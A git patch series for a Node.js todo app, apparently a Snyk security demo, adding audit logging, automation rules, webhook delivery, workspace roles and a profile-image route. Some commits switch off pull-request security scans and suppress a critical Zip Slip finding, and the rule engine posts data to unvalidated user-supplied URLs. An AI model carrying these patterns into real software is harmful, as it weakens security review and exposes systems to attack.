map@0.6.1"]},{"ref":"625-stack-utils@1.0.2"},{"ref":"626-tap-mocha-reporter@3.0.9","dependsOn":["332-color-support@1.1.3","91-debug@2.6.9","627-diff@1.4.0","448-escape-string-regexp@1.0.5","77-glob@7.1.3","16-js-yaml@3.13.1","628-tap-parser@5.4.0","630-unicode-length@1.0.3","170-readable-stream@2.3.7"]},{"ref":"627-diff@1.4.0"},{"ref":"628-tap-parser@5.4.0","dependsOn":["629-events-to-array@1.1.2","16-js-yaml@3.13.1","170-readable-stream@2.3.7"]},{"ref":"629-events-to-array@1.1.2"},{"ref":"630-unicode-length@1.0.3","dependsOn":["377-punycode@1.4.1","451-strip-ansi@3.0.1"]},{"ref":"631-tap-parser@7.0.0","dependsOn":["629-events-to-array@1.1.2","16-js-yaml@3.13.1","390-minipass@2.9.0"]},{"ref":"632-tmatch@3.1.0"},{"ref":"633-trivial-deferred@1.0.1"},{"ref":"634-tsame@1.1.2"},{"ref":"635-write-file-atomic@2.4.3","dependsOn":["74-graceful-fs@4.1.15","402-imurmurhash@0.1.4","387-signal-exit@3.0.2"]},{"ref":"636-yapool@1.0.0"},{"ref":"637-typeorm@0.2.24","dependsOn":["638-app-root-path@3.0.0","639-buffer@5.6.0","640-chalk@2.4.2","646-cli-highlight@2.1.4","148-debug@4.4.3","680-dotenv@6.2.0","77-glob@7.1.3","16-js-yaml@3.13.1","681-mkdirp@0.5.5","682-reflect-metadata@0.1.13","683-sha.js@2.4.11","684-tslib@1.10.0","685-xml2js@0.4.23","688-yargonaut@1.1.4","691-yargs@13.3.2"]},{"ref":"638-app-root-path@3.0.0"},{"ref":"639-buffer@5.6.0","dependsOn":["189-base64-js@1.5.1","190-ieee754@1.1.13"]},{"ref":"640-chalk@2.4.2","dependsOn":["641-ansi-styles@3.2.1","448-escape-string-regexp@1.0.5","644-supports-color@5.5.0"]},{"ref":"641-ansi-styles@3.2.1","dependsOn":["642-color-convert@1.9.3"]},{"ref":"642-color-convert@1.9.3","dependsOn":["643-color-name@1.1.3"]},{"ref":"643-color-name@1.1.3"},{"ref":"644-supports-color@5.5.0","dependsOn":["645-has-flag@3.0.0"]},{"ref":"645-has-flag@3.0.0"},{"ref":"646-cli-highlight@2.1.4","dependsOn":["647-chalk@3.0.0","654-highlight.js@9.18.1","655-mz@2.7.0","659-parse5@5.1.1","660-parse5-htmlparser2-tree-adapter@5.1.1","661-yargs@15.4.1"]},{"ref":"647-chalk@3.0.0","dependsOn":["648-ansi-styles@4.2.1","652-supports-color@7.1.0"]},{"ref":"648-ansi-styles@4.2.1","dependsOn":["649-@types/color-name@1.1.1","650-color-convert@2.0.1"]},{"ref":"649-@types/color-name@1.1.1"},{"ref":"650-color-convert@2.0.1","dependsOn":["651-color-name@1.1.4"]},{"ref":"651-color-name@1.1.4"},{"ref":"652-supports-color@7.1.0","dependsOn":["653-has-flag@4.0.0"]},{"ref":"653-has-flag@4.0.0"},{"ref":"654-highlight.js@9.18.1"},{"ref":"655-mz@2.7.0","dependsOn":["656-any-promise@1.3.0","298-object-assign@4.1.1","657-thenify-all@1.6.0"]},{"ref":"656-any-promise@1.3.0"},{"ref":"657-thenify-all@1.6.0","dependsOn":["658-thenify@3.3.1"]},{"ref":"658-thenify@3.3.1","dependsOn":["656-any-promise@1.3.0"]},{"ref":"659-parse5@5.1.1"},{"ref":"660-parse5-htmlparser2-tree-adapter@5.1.1","dependsOn":["659-parse5@5.1.1"]},{"ref":"661-yargs@15.4.1","dependsOn":["662-cliui@6.0.0","483-decamelize@1.2.0","669-find-up@4.1.0","675-get-caller-file@2.0.5","614-require-directory@2.1.1","676-require-main-filename@2.0.0","615-set-blocking@2.0.0","663-string-width@4.2.0","616-which-module@2.0.0","677-y18n@4.0.0","678-yargs-parser@18.1.3"]},{"ref":"662-cliui@6.0.0","dependsOn":["663-string-width@4.2.0","666-strip-ansi@6.0.0","668-wrap-ansi@6.2.0"]},{"ref":"663-string-width@4.2.0","dependsOn":["664-emoji-regex@8.0.0","665-is-fullwidth-code-point@3.0.0","666-strip-ansi@6.0.0"]},{"ref":"664-emoji-regex@8.0.0"},{"ref":"665-is-fullwidth-code-point@3.0.0"},{"ref":"666-strip-ansi@6.0.0","dependsOn":["667-ansi-regex@5.0.0"]},{"ref":"667-ansi-regex@5.0.0"},{"ref":"668-wrap-ansi@6.2.0","dependsOn":["648-ansi-styles@4.2.1","663-string-width@4.2.0","666-strip-ansi@6.0.0"]},{"ref":"669-find-up@4.1.0","dependsOn":["670-locate-path@5.0.0","674-path-exists@4.0.0"]},{"ref":"670-locate-path@5.0.0","dependsOn":["671-p-locate@4.1.0"]},{"ref":"671-p-locate@4.1.0","dependsOn":["672-p-limit@2.3.0"]},{"ref":"672-p-limit@2.3.0","dependsOn":["673-p-try@2.2.0"]},{"ref":"673-p-try@2.2.0"},{"ref":"674-path-exists@4.0.0"},{"ref":"675-get-caller-file@2.0.5"},{"ref":"676-require-main-filename@2.0.0"},{"ref":"677-y18n@4.0.0"},{"ref":"678-yargs-parser@18.1.3","dependsOn":["679-camelcase@5.3.1","483-decamelize@1.2.0"]},{"ref":"679-camelcase@5.3.1"},{"ref":"680-dotenv@6.2.0"},{"ref":"681-mkdirp@0.5.5","dependsOn":["297-minimist@1.2.8"]},{"ref":"682-reflect-metadata@0.1.13"},{"ref":"683-sha.js@2.4.11","dependsOn":["82-inherits@2.0.3","174-safe-buffer@5.1.2"]},{"ref":"684-tslib@1.10.0"},{"ref":"685-xml2js@0.4.23","dependsOn":["686-sax@1.2.4","687-xmlbuilder@11.0.1"]},{"ref":"686-sax@1.2.4"},{"ref":"687-xmlbuilder@11.0.1"},{"ref":"688-yargonaut@1.1.4","dependsOn":["446-chalk@1.1.3","689-figlet@1.5.0","690-parent-require@1.0.0"]},{"ref":"689-figlet@1.5.0"},{"ref":"690-parent-require@1.0.0"},{"ref":"691-yargs@13.3.2","dependsOn":["692-cliui@5.0.0","698-find-up@3.0.0","675-get-caller-file@2.0.5","614-require-directory@2.1.1","676-require-main-filename@2.0.0","615-set-blocking@2.0.0","693-string-width@3.1.0","616-which-module@2.0.0","677-y18n@4.0.0","701-yargs-parser@13.1.2"]},{"ref":"692-cliui@5.0.0","dependsOn":["693-string-width@3.1.0","695-strip-ansi@5.2.0","697-wrap-ansi@5.1.0"]},{"ref":"693-string-width@3.1.0","dependsOn":["694-emoji-regex@7.0.3","590-is-fullwidth-code-point@2.0.0","695-strip-ansi@5.2.0"]},{"ref":"694-emoji-regex@7.0.3"},{"ref":"695-strip-ansi@5.2.0","dependsOn":["696-ansi-regex@4.1.0"]},{"ref":"696-ansi-regex@4.1.0"},{"ref":"697-wrap-ansi@5.1.0","dependsOn":["641-ansi-styles@3.2.1","693-string-width@3.1.0","695-strip-ansi@5.2.0"]},{"ref":"698-find-up@3.0.0","dependsOn":["699-locate-path@3.0.0"]},{"ref":"699-locate-path@3.0.0","dependsOn":["700-p-locate@3.0.0","421-path-exists@3.0.0"]},{"ref":"700-p-locate@3.0.0","dependsOn":["672-p-limit@2.3.0"]},{"ref":"701-yargs-parser@13.1.2","dependsOn":["679-camelcase@5.3.1","483-decamelize@1.2.0"]}]} + diff --git a/sbom-errors.txt b/sbom-errors.txt new file mode 100644 index 00000000000..e69de29bb2d diff --git a/scripts/audit-retention.js b/scripts/audit-retention.js new file mode 100644 index 00000000000..17bade49869 --- /dev/null +++ b/scripts/audit-retention.js @@ -0,0 +1,23 @@ +#!/usr/bin/env node +/** + * Optional: Delete audit events older than a retention period (e.g. 90 days). + * Run via: node scripts/audit-retention.js [days] + * Default: 90 days. + */ + +var mongoose = require('mongoose'); +require('../mongoose-db'); +var AuditEvent = mongoose.model('AuditEvent'); + +var retentionDays = parseInt(process.argv[2], 10) || 90; +var cutoff = new Date(); +cutoff.setDate(cutoff.getDate() - retentionDays); + +AuditEvent.deleteMany({ createdAt: { $lt: cutoff } }).exec(function (err, result) { + if (err) { + console.error(err); + process.exit(1); + } + console.log('Deleted ' + (result && result.deletedCount) + ' audit events older than ' + retentionDays + ' days.'); + process.exit(0); +}); diff --git a/services/audit.js b/services/audit.js new file mode 100644 index 00000000000..8a50458efec --- /dev/null +++ b/services/audit.js @@ -0,0 +1,36 @@ +/** + * Audit log: create events for workspace/todo/member mutations. + */ + +var mongoose = require('mongoose'); +var AuditEvent = mongoose.model('AuditEvent'); + +function createEvent(options, cb) { + var doc = { + workspace: options.workspace, + actor: options.actor, + action: options.action, + resourceType: options.resourceType, + resourceId: options.resourceId, + details: options.details || {}, + ip: options.ip || null, + }; + var event = new AuditEvent(doc); + event.save(function (err, saved) { + if (cb) cb(err, saved); + }); +} + +function createEventPromise(options) { + return new Promise(function (resolve, reject) { + createEvent(options, function (err, saved) { + if (err) reject(err); + else resolve(saved); + }); + }); +} + +module.exports = { + createEvent: createEvent, + createEventPromise: createEventPromise, +}; diff --git a/services/rule-engine.js b/services/rule-engine.js new file mode 100644 index 00000000000..9d998d5b34f --- /dev/null +++ b/services/rule-engine.js @@ -0,0 +1,196 @@ +/** + * Automation rules: condition evaluation and action execution. + * Triggers: schedule (cron), todo.created, todo.updated. + * Actions: send_webhook, update_todos. + */ + +var mongoose = require('mongoose'); +var Todo = mongoose.model('Todo'); +var Rule = mongoose.model('Rule'); +var cron = require('node-cron'); +var webhookDelivery = require('./webhook-delivery'); + +var MAX_RULES_PER_WORKSPACE = 50; +var MAX_ACTIONS_PER_RULE = 5; +var BULK_UPDATE_LIMIT = 100; + +var CONDITION_OPS = { + eq: function (a, b) { return a == b; }, + neq: function (a, b) { return a != b; }, + in: function (a, b) { return Array.isArray(b) && b.indexOf(a) !== -1; }, + contains: function (a, b) { + if (!Array.isArray(a)) return false; + return a.indexOf(b) !== -1; + }, + before: function (a, b) { + var d = a instanceof Date ? a : new Date(a); + var ref = b instanceof Date ? b : new Date(b); + return !isNaN(d.getTime()) && !isNaN(ref.getTime()) && d < ref; + }, + after: function (a, b) { + var d = a instanceof Date ? a : new Date(a); + var ref = b instanceof Date ? b : new Date(b); + return !isNaN(d.getTime()) && !isNaN(ref.getTime()) && d > ref; + }, +}; + +function todoToContext(todo) { + var content = todo.content; + var contentStr = Buffer.isBuffer(content) ? content.toString('utf8') : (content || ''); + return { + _id: todo._id, + content: contentStr, + due_date: todo.due_date, + priority: todo.priority, + tags: todo.tags || [], + updated_at: todo.updated_at, + workspace: todo.workspace, + }; +} + +function evaluateConditions(conditions, context) { + if (!Array.isArray(conditions) || conditions.length === 0) return true; + for (var i = 0; i < conditions.length; i++) { + var c = conditions[i]; + var field = c.field; + var op = c.op; + var value = c.value; + if (!field || !op) continue; + var fieldValue = context[field]; + if (field === 'due_date' && fieldValue && !(fieldValue instanceof Date)) { + fieldValue = new Date(fieldValue); + } + var fn = CONDITION_OPS[op]; + if (!fn) continue; + if (op === 'contains' && field === 'tags') { + if (!fn(context.tags || [], value)) return false; + } else if (!fn(fieldValue, value)) { + return false; + } + } + return true; +} + +function buildTodoQueryFromConditions(conditions, workspaceId) { + var query = { workspace: workspaceId, deleted_at: null }; + if (!Array.isArray(conditions) || conditions.length === 0) return query; + conditions.forEach(function (c) { + var field = c.field; + var op = c.op; + var value = c.value; + if (!field || !op) return; + if (field === 'priority' && op === 'eq') query.priority = value; + else if (field === 'priority' && op === 'in') query.priority = { $in: value }; + else if (field === 'tags' && op === 'contains') query.tags = value; + else if (field === 'due_date' && op === 'before') query.due_date = { $lt: new Date(value) }; + else if (field === 'due_date' && op === 'after') query.due_date = { $gt: new Date(value) }; + }); + return query; +} + +function executeActions(workspaceId, context, actions, cb) { + if (!Array.isArray(actions) || actions.length === 0) return cb && cb(); + var run = function (idx) { + if (idx >= Math.min(actions.length, MAX_ACTIONS_PER_RULE)) return cb && cb(); + var action = actions[idx]; + var type = action.type; + if (type === 'send_webhook' && action.url) { + var payload = { + event: 'rule.triggered', + resourceType: 'todo', + resourceId: context._id ? String(context._id) : '', + workspaceId: String(workspaceId), + data: context, + timestamp: new Date().toISOString(), + }; + webhookDelivery.enqueueUrl(action.url, action.secret || '', payload); + run(idx + 1); + return; + } + if (type === 'update_todos' && action.updates && context.conditions) { + var query = buildTodoQueryFromConditions(context.conditions, workspaceId); + Todo.find(query).limit(BULK_UPDATE_LIMIT).exec(function (err, todos) { + if (err) return run(idx + 1); + var update = { updated_at: new Date() }; + if (action.updates.priority) update.priority = action.updates.priority; + if (action.updates.tags) update.tags = action.updates.tags; + if (action.updates.due_date) update.due_date = new Date(action.updates.due_date); + Todo.updateMany(query, { $set: update }).exec(function () { + run(idx + 1); + }); + }); + return; + } + run(idx + 1); + }; + run(0); +} + +function runRulesForTodo(workspaceId, trigger, todo, cb) { + Rule.find({ + workspace: workspaceId, + enabled: true, + trigger: trigger, + }).lean().exec(function (err, rules) { + if (err || !rules.length) return cb && cb(); + var context = todoToContext(todo); + rules.forEach(function (rule) { + if (evaluateConditions(rule.conditions, context)) { + context.conditions = rule.conditions; + executeActions(workspaceId, context, rule.actions, function () {}); + } + }); + cb && cb(); + }); +} + +var cronJob = null; + +function startScheduler() { + if (cronJob) return; + cronJob = cron.schedule('* * * * *', function () { + Rule.find({ enabled: true, trigger: 'schedule' }).lean().exec(function (err, rules) { + if (err || !rules.length) return; + var now = new Date(); + var minuteStart = new Date(now.getFullYear(), now.getMonth(), now.getDate(), now.getHours(), now.getMinutes(), 0, 0); + var minuteEnd = minuteStart.getTime() + 60000; + rules.forEach(function (rule) { + if (!rule.schedule) return; + try { + if (!cron.validate(rule.schedule)) return; + var schedule = cron.schedule(rule.schedule); + var nextRun = schedule.next(); + if (!nextRun) return; + var nextMs = nextRun.getTime ? nextRun.getTime() : nextRun; + if (nextMs >= minuteStart.getTime() && nextMs < minuteEnd) { + var query = buildTodoQueryFromConditions(rule.conditions || [], rule.workspace); + Todo.find(query).limit(BULK_UPDATE_LIMIT).lean().exec(function (e, todos) { + if (e) return; + var context = { conditions: rule.conditions }; + executeActions(rule.workspace, context, rule.actions, function () {}); + }); + } + } catch (_) {} + }); + }); + }); +} + +function stopScheduler() { + if (cronJob) { + cronJob.stop(); + cronJob = null; + } +} + +module.exports = { + evaluateConditions: evaluateConditions, + buildTodoQueryFromConditions: buildTodoQueryFromConditions, + executeActions: executeActions, + runRulesForTodo: runRulesForTodo, + todoToContext: todoToContext, + startScheduler: startScheduler, + stopScheduler: stopScheduler, + MAX_RULES_PER_WORKSPACE: MAX_RULES_PER_WORKSPACE, + MAX_ACTIONS_PER_RULE: MAX_ACTIONS_PER_RULE, +}; diff --git a/services/webhook-delivery.js b/services/webhook-delivery.js new file mode 100644 index 00000000000..e06fb44887a --- /dev/null +++ b/services/webhook-delivery.js @@ -0,0 +1,205 @@ +/** + * Webhook delivery: in-memory queue and worker. POST to URL with HMAC signature. + * Payload max 100kb, timeout 15s. Retry up to 3 times with backoff. + */ + +var crypto = require('crypto'); +var mongoose = require('mongoose'); +var Webhook = mongoose.model('Webhook'); +var WebhookDelivery = mongoose.model('WebhookDelivery'); +var https = require('https'); +var http = require('http'); +var url = require('url'); + +var PAYLOAD_MAX_BYTES = 100 * 1024; +var REQUEST_TIMEOUT_MS = 15000; +var MAX_RETRIES = 3; +var BACKOFF_BASE_MS = 1000; + +var queue = []; +var processing = false; +var MAX_QUEUE = 1000; + +function signPayload(secret, body) { + var bodyStr = typeof body === 'string' ? body : JSON.stringify(body); + var hmac = crypto.createHmac('sha256', secret || ''); + hmac.update(bodyStr); + return 'sha256=' + hmac.digest('hex'); +} + +function enqueue(webhookId, event, payload) { + if (queue.length >= MAX_QUEUE) return; + var bodyStr = JSON.stringify(payload); + if (Buffer.byteLength(bodyStr, 'utf8') > PAYLOAD_MAX_BYTES) { + bodyStr = JSON.stringify({ + event: payload.event, + resourceType: payload.resourceType, + resourceId: payload.resourceId, + workspaceId: payload.workspaceId, + timestamp: payload.timestamp, + data: { truncated: true, reason: 'Payload exceeded size limit' }, + }); + } + queue.push({ + webhookId: webhookId, + event: event, + body: bodyStr, + payload: payload, + }); + drain(); +} + +/** + * Enqueue delivery to a raw URL (e.g. from rule action). webhookId may be null; url and optional secret provided. + */ +function enqueueUrl(urlStr, secret, payload) { + if (queue.length >= MAX_QUEUE) return; + var bodyStr = JSON.stringify(payload); + if (Buffer.byteLength(bodyStr, 'utf8') > PAYLOAD_MAX_BYTES) { + bodyStr = JSON.stringify({ + event: payload.event, + resourceType: payload.resourceType, + resourceId: payload.resourceId, + workspaceId: payload.workspaceId, + timestamp: payload.timestamp, + data: { truncated: true, reason: 'Payload exceeded size limit' }, + }); + } + queue.push({ + webhookId: null, + url: urlStr, + secret: secret || '', + event: payload.event || 'rule.triggered', + body: bodyStr, + payload: payload, + }); + drain(); +} + +function drain() { + if (processing || queue.length === 0) return; + processing = true; + var item = queue.shift(); + deliver(item, 0, function () { + processing = false; + if (queue.length > 0) setImmediate(drain); + }); +} + +function deliver(item, attempt, done) { + function doRequest(targetUrl, secret, webhookOrNull) { + var signature = signPayload(secret, item.body); + var parsed = url.parse(targetUrl); + var isHttps = parsed.protocol === 'https:'; + var client = isHttps ? https : http; + var options = { + hostname: parsed.hostname, + port: parsed.port || (isHttps ? 443 : 80), + path: parsed.path || '/', + method: 'POST', + headers: { + 'Content-Type': 'application/json', + 'Content-Length': Buffer.byteLength(item.body, 'utf8'), + 'X-Webhook-Signature': signature, + }, + }; + var req = client.request(options, function (res) { + var statusCode = res.statusCode; + res.on('data', function () {}); + res.on('end', function () { + if (statusCode >= 200 && statusCode < 300) { + if (webhookOrNull) saveDelivery(webhookOrNull._id, webhookOrNull.url, 'success', statusCode, null, function () {}); + } else { + var errMsg = 'HTTP ' + statusCode; + if (webhookOrNull) { + saveDelivery(webhookOrNull._id, webhookOrNull.url, 'failed', statusCode, errMsg, function () {}); + updateWebhookLastFailure(webhookOrNull, 'failed', statusCode, errMsg); + } + if (attempt < MAX_RETRIES - 1) { + var delay = BACKOFF_BASE_MS * Math.pow(2, attempt); + setTimeout(function () { deliver(item, attempt + 1, done); }, delay); + return; + } + } + done(); + }); + }); + req.on('error', function (e) { + if (webhookOrNull) { + saveDelivery(webhookOrNull._id, webhookOrNull.url, 'failed', null, e.message, function () {}); + updateWebhookLastFailure(webhookOrNull, 'failed', null, e.message); + } + if (attempt < MAX_RETRIES - 1) { + var delay = BACKOFF_BASE_MS * Math.pow(2, attempt); + setTimeout(function () { deliver(item, attempt + 1, done); }, delay); + return; + } + done(); + }); + req.setTimeout(REQUEST_TIMEOUT_MS, function () { + req.destroy(); + }); + req.write(item.body); + req.end(); + } + if (item.webhookId) { + Webhook.findById(item.webhookId).exec(function (err, webhook) { + if (err || !webhook || !webhook.active) { + processing = false; + return done(); + } + doRequest(webhook.url, webhook.secret, webhook); + }); + } else if (item.url) { + doRequest(item.url, item.secret || '', null); + } else { + processing = false; + done(); + } +} + +function saveDelivery(webhookId, urlStr, status, statusCode, error, cb) { + var doc = { + webhook: webhookId, + url: urlStr, + status: status, + statusCode: statusCode || null, + error: error || null, + }; + WebhookDelivery.create(doc, cb); +} + +function updateWebhookLastFailure(webhook, status, statusCode, error) { + webhook.lastFailure = { + status: status, + statusCode: statusCode || null, + error: error || null, + attemptedAt: new Date(), + }; + webhook.save(function () {}); +} + +function notifyWebhooks(workspaceId, event, payload) { + Webhook.find({ workspace: workspaceId, active: true, events: event }).lean().exec(function (err, webhooks) { + if (err || !webhooks || webhooks.length === 0) return; + var fullPayload = { + event: event, + resourceType: payload.resourceType || 'todo', + resourceId: payload.resourceId || '', + workspaceId: String(workspaceId), + data: payload.data || payload, + timestamp: new Date().toISOString(), + }; + webhooks.forEach(function (w) { + enqueue(w._id, event, fullPayload); + }); + }); +} + +module.exports = { + enqueue: enqueue, + enqueueUrl: enqueueUrl, + drain: drain, + notifyWebhooks: notifyWebhooks, + signPayload: signPayload, +}; diff --git a/services/workspace-auth.js b/services/workspace-auth.js new file mode 100644 index 00000000000..83979395404 --- /dev/null +++ b/services/workspace-auth.js @@ -0,0 +1,73 @@ +/** + * Workspace membership and role checks for API. + */ + +var mongoose = require('mongoose'); +var Workspace = mongoose.model('Workspace'); +var WorkspaceMember = mongoose.model('WorkspaceMember'); + +var ROLES_WITH_WRITE = ['owner', 'admin', 'member']; +var ROLES_WITH_ADMIN = ['owner', 'admin']; + +function getMembership(workspaceId, userId) { + if (!workspaceId || !userId) return Promise.resolve(null); + if (!mongoose.Types.ObjectId.isValid(workspaceId)) return Promise.resolve(null); + var wid = typeof workspaceId === 'string' ? workspaceId : String(workspaceId); + var uid = typeof userId === 'string' ? userId : String(userId); + return WorkspaceMember.findOne({ + workspace: new mongoose.Types.ObjectId(wid), + user: uid, + }).lean().exec(); +} + +function requireMember(req, res, next) { + var workspaceId = req.params.workspaceId || req.params.id; + var userId = req.apiUserId; + if (!userId) { + return res.status(401).json({ error: 'Authentication required' }); + } + if (!mongoose.Types.ObjectId.isValid(workspaceId)) { + return res.status(400).json({ error: 'Invalid workspace ID' }); + } + getMembership(workspaceId, userId).then(function (membership) { + if (!membership) { + return res.status(403).json({ error: 'Not a member of this workspace' }); + } + req.workspaceMembership = membership; + req.workspaceId = membership.workspace; + next(); + }).catch(function (err) { + next(err); + }); +} + +function requireRole(allowedRoles) { + return function (req, res, next) { + var membership = req.workspaceMembership; + if (!membership) { + return res.status(403).json({ error: 'Not a member of this workspace' }); + } + if (!allowedRoles.includes(membership.role)) { + return res.status(403).json({ error: 'Insufficient role. Required: ' + allowedRoles.join(' or ') }); + } + next(); + }; +} + +function requireWriteRole(req, res, next) { + return requireRole(ROLES_WITH_WRITE)(req, res, next); +} + +function requireAdminRole(req, res, next) { + return requireRole(ROLES_WITH_ADMIN)(req, res, next); +} + +module.exports = { + getMembership: getMembership, + requireMember: requireMember, + requireRole: requireRole, + requireWriteRole: requireWriteRole, + requireAdminRole: requireAdminRole, + ROLES_WITH_WRITE: ROLES_WITH_WRITE, + ROLES_WITH_ADMIN: ROLES_WITH_ADMIN, +}; From 86c211fa95f65f7561a52c1676ff96583916f555 Mon Sep 17 00:00:00 2001 From: Phil Varner Date: Fri, 27 Feb 2026 08:32:04 -0700 Subject: [PATCH 5/7] Disable Snyk SCA/SAST checks on pull requests Comment out the pull_request trigger so the pipeline only runs on pushes to main/master and manual dispatch. Made-with: Cursor --- .github/workflows/snyk-sca-sast-demo.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/snyk-sca-sast-demo.yml b/.github/workflows/snyk-sca-sast-demo.yml index 8bddba28f17..35719686483 100644 --- a/.github/workflows/snyk-sca-sast-demo.yml +++ b/.github/workflows/snyk-sca-sast-demo.yml @@ -10,8 +10,8 @@ name: Snyk SCA and SAST Security Pipeline on: push: branches: [ main, master ] - pull_request: - branches: [ main, master ] + # pull_request: + # branches: [ main, master ] workflow_dispatch: # ============================================================================ From 9477710c9a101bf7223b1b0590ccd3843d35b946 Mon Sep 17 00:00:00 2001 From: Phil Varner Date: Fri, 6 Mar 2026 10:16:52 -0700 Subject: [PATCH 6/7] Add .snyk policy with adm-zip Zip Slip ignore Only the npm:adm-zip:20180415 (Zip Slip) vulnerability is ignored, to test visibility in the Snyk Dashboard UI. Made-with: Cursor --- .snyk | 44 ++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 .snyk diff --git a/.snyk b/.snyk new file mode 100644 index 00000000000..e9f4ef706c8 --- /dev/null +++ b/.snyk @@ -0,0 +1,44 @@ +# Snyk (https://snyk.io) policy file +# See https://docs.snyk.io/manage-risk/policies/the-.snyk-file for details +version: v1.25.0 + +# ============================================================================= +# EXCLUDE: Prevent files/directories from being scanned by Snyk Code (SAST) +# ============================================================================= +# Patterns follow .gitignore syntax. These files will be completely skipped +# during SAST analysis. +# exclude: +# global: +# # Skip intentionally vulnerable demo files +# # - routes/xss-vulnerable.js +# +# # Skip test files — they often contain mock payloads that trigger false positives +# - tests/** + +# ============================================================================= +# IGNORE: Suppress specific Open Source (SCA) vulnerabilities +# ============================================================================= +# Use this when a vulnerability has been reviewed and accepted as low risk, +# is not exploitable in your context, or has no available fix. +# Each entry requires an expiry date and a reason for audit trail purposes. +ignore: + # --- Critical: Zip Slip in adm-zip (accepted risk — no user-uploaded zips) --- + 'npm:adm-zip:20180415': + - '*': + reason: 'Accepted risk — application does not process user-uploaded zip files' + expires: 2026-03-07T00:00:00.000Z + created: 2026-02-27T00:00:00.000Z + + # # --- High: Prototype Pollution in lodash (deep dependency, no direct usage) --- + # SNYK-JS-LODASH-567746: + # - '*': + # reason: 'Transitive dependency — lodash merge/defaults not called with user input' + # expires: 2026-06-01T00:00:00.000Z + # created: 2026-02-27T00:00:00.000Z + + # # --- Medium: Prototype Pollution in js-yaml (dev/config only) --- + # SNYK-JS-JSYAML-13961110: + # - '*': + # reason: 'js-yaml only parses trusted config files, not user-supplied input' + # expires: 2026-06-01T00:00:00.000Z + # created: 2026-01-27T00:00:00.000Z From 267088f19420e2235ea3e40dd1387099efc25c51 Mon Sep 17 00:00:00 2001 From: Phil Varner Date: Tue, 7 Apr 2026 12:31:04 -0600 Subject: [PATCH 7/7] feat(users): add rate-limited profile image endpoint - Serve profile images from public/images/profiles with extension allowlist, numeric user ID validation, and path traversal checks - Add express-rate-limit dependency - Enable Snyk Code global exclude for tests/** in .snyk Pre-commit: Snyk Code scan and Snyk Open Source (SCA) scan were run on the repo. Made-with: Cursor --- .snyk | 16 ++++++++-------- package-lock.json | 27 +++++++++++++++++++++++++++ package.json | 1 + routes/users.js | 43 +++++++++++++++++++++++++++++++++++++++++++ 4 files changed, 79 insertions(+), 8 deletions(-) diff --git a/.snyk b/.snyk index e9f4ef706c8..3f35b4fca6c 100644 --- a/.snyk +++ b/.snyk @@ -7,13 +7,13 @@ version: v1.25.0 # ============================================================================= # Patterns follow .gitignore syntax. These files will be completely skipped # during SAST analysis. -# exclude: -# global: -# # Skip intentionally vulnerable demo files -# # - routes/xss-vulnerable.js -# -# # Skip test files — they often contain mock payloads that trigger false positives -# - tests/** +exclude: + global: + # Skip intentionally vulnerable demo files + # - routes/xss-vulnerable.js + + # Skip test files — they often contain mock payloads that trigger false positives + - tests/** # ============================================================================= # IGNORE: Suppress specific Open Source (SCA) vulnerabilities @@ -23,7 +23,7 @@ version: v1.25.0 # Each entry requires an expiry date and a reason for audit trail purposes. ignore: # --- Critical: Zip Slip in adm-zip (accepted risk — no user-uploaded zips) --- - 'npm:adm-zip:20180415': + 'npm:adm-zip:20180415': - '*': reason: 'Accepted risk — application does not process user-uploaded zip files' expires: 2026-03-07T00:00:00.000Z diff --git a/package-lock.json b/package-lock.json index 4b8ac39a3c2..a0102b303f8 100644 --- a/package-lock.json +++ b/package-lock.json @@ -22,6 +22,7 @@ "errorhandler": "1.2.0", "express": "4.12.4", "express-fileupload": "0.0.5", + "express-rate-limit": "^8.3.1", "express-session": "^1.17.2", "express-validator": "^7.3.1", "file-type": "^8.1.0", @@ -4664,6 +4665,24 @@ "node": ">=0.8.0" } }, + "node_modules/express-rate-limit": { + "version": "8.3.1", + "resolved": "https://registry.npmjs.org/express-rate-limit/-/express-rate-limit-8.3.1.tgz", + "integrity": "sha512-D1dKN+cmyPWuvB+G2SREQDzPY1agpBIcTa9sJxOPMCNeH3gwzhqJRDWCXW3gg0y//+LQ/8j52JbMROWyrKdMdw==", + "license": "MIT", + "dependencies": { + "ip-address": "10.1.0" + }, + "engines": { + "node": ">= 16" + }, + "funding": { + "url": "https://github.com/sponsors/express-rate-limit" + }, + "peerDependencies": { + "express": ">= 4.11" + } + }, "node_modules/express-session": { "version": "1.17.2", "resolved": "https://registry.npmjs.org/express-session/-/express-session-1.17.2.tgz", @@ -19210,6 +19229,14 @@ "streamifier": "^0.1.1" } }, + "express-rate-limit": { + "version": "8.3.1", + "resolved": "https://registry.npmjs.org/express-rate-limit/-/express-rate-limit-8.3.1.tgz", + "integrity": "sha512-D1dKN+cmyPWuvB+G2SREQDzPY1agpBIcTa9sJxOPMCNeH3gwzhqJRDWCXW3gg0y//+LQ/8j52JbMROWyrKdMdw==", + "requires": { + "ip-address": "10.1.0" + } + }, "express-session": { "version": "1.17.2", "resolved": "https://registry.npmjs.org/express-session/-/express-session-1.17.2.tgz", diff --git a/package.json b/package.json index e43ec3f4b5e..4d31f912749 100644 --- a/package.json +++ b/package.json @@ -28,6 +28,7 @@ "errorhandler": "1.2.0", "express": "4.12.4", "express-fileupload": "0.0.5", + "express-rate-limit": "^8.3.1", "express-session": "^1.17.2", "express-validator": "^7.3.1", "file-type": "^8.1.0", diff --git a/routes/users.js b/routes/users.js index 84fbd797dfd..6c33691fff7 100644 --- a/routes/users.js +++ b/routes/users.js @@ -1,10 +1,53 @@ var express = require('express') var typeorm = require("typeorm"); +var path = require('path'); +var fs = require('fs'); +var rateLimit = require('express-rate-limit'); var router = express.Router() module.exports = router +var PROFILE_IMAGES_DIR = path.join(__dirname, '..', 'public', 'images', 'profiles'); +var ALLOWED_EXTENSIONS = ['.png', '.jpg', '.jpeg', '.gif', '.webp']; + +var profileImageLimiter = rateLimit({ + windowMs: 60 * 1000, + max: 30, + message: { error: 'Too many requests' } +}); + +router.get('/:id/profile-image', profileImageLimiter, async (req, res, next) => { + try { + var userId = req.params.id; + + if (!/^\d+$/.test(userId)) { + return res.status(400).json({ error: 'Invalid user ID' }); + } + + var matchingFile = null; + for (var i = 0; i < ALLOWED_EXTENSIONS.length; i++) { + var candidate = path.join(PROFILE_IMAGES_DIR, userId + ALLOWED_EXTENSIONS[i]); + var resolved = path.resolve(candidate); + if (!resolved.startsWith(path.resolve(PROFILE_IMAGES_DIR))) { + return res.status(400).json({ error: 'Invalid user ID' }); + } + if (fs.existsSync(candidate)) { 